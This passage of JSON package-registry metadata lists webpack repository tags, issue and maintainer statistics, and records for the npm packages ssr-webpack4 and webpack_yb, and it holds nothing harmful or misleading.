itHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-09-01T04:12:00.754Z","dependent_packages_count":6,"downloads":260,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.362296710706985,"dependent_packages_count":53.60654724162076,"stargazers_count":0.08329460057707973,"forks_count":0.40582326181237627,"docker_downloads_count":null,"average":22.8644904536793},"purl":"pkg:npm/ssr-webpack4","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/ssr-webpack4","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/ssr-webpack4","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/ssr-webpack4/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T19:17:33.706Z","issues_count":10170,"pull_requests_count":9468,"avg_time_to_close_issue":10847458.413030302,"avg_time_to_close_pull_request":2764488.9421997755,"issues_closed_count":9900,"pull_requests_closed_count":8910,"pull_request_authors_count":1445,"issue_authors_count":6691,"avg_comments_per_issue":5.832251720747296,"avg_comments_per_pull_request":3.1891634980988592,"merged_pull_requests_count":6045,"bot_issues_count":8,"bot_pull_requests_count":2916,"past_year_issues_count":85,"past_year_pull_requests_count":955,"past_year_avg_time_to_close_issue":839618.0847457628,"past_year_avg_time_to_close_pull_request":356132.6119205298,"past_year_issues_closed_count":59,"past_year_pull_requests_closed_count":755,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":67,"past_year_avg_comments_per_issue":3.2823529411764705,"past_year_avg_comments_per_pull_request":4.964397905759163,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":141,"past_year_merged_pull_requests_count":601,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":178,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":130,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":452,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"TheLarkInn","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/ssr-webpack4/codemeta","maintainers":[{"uuid":"zhangyuang","login":"zhangyuang","name":null,"email":"569105585@qq.com","url":null,"packages_count":447,"html_url":"https://www.npmjs.com/~zhangyuang","role":null,"created_at":"2023-09-19T16:37:15.548Z","updated_at":"2023-09-19T16:37:15.548Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/zhangyuang/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1209223,"name":"webpack_yb","ecosystem":"npm","description":"base webpack 3.10.0 Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2018-02-05T08:02:03.983Z","latest_release_published_at":"2018-02-05T08:02:03.983Z","latest_release_number":"0.0.1","last_synced_at":"2026-09-03T01:35:44.768Z","created_at":"2022-04-08T13:45:46.906Z","updated_at":"2026-09-03T01:35:44.768Z","registry_url":"https://www.npmjs.com/package/webpack_yb","install_command":"npm install webpack_yb","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.0.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/